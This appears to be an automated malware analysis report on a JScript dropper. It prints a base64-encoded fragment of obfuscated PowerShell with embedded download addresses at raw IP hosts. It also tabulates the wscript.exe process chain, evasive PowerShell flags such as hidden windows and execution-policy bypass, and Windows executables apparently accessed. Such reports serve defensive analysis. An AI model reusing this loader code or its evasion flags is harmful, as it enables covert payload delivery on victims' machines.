AFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA" | ||||||
parent_process | wscript.exe | martian_process | wscript "C:\Users\test22\AppData\Local\Temp\Fyhri.js" mostness BorderlandDownhearted Achromatise | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Fyhri.js" mostness BorderlandDownhearted Achromatise |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -nologo | value | Hides the copyright banner when PowerShell launches | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |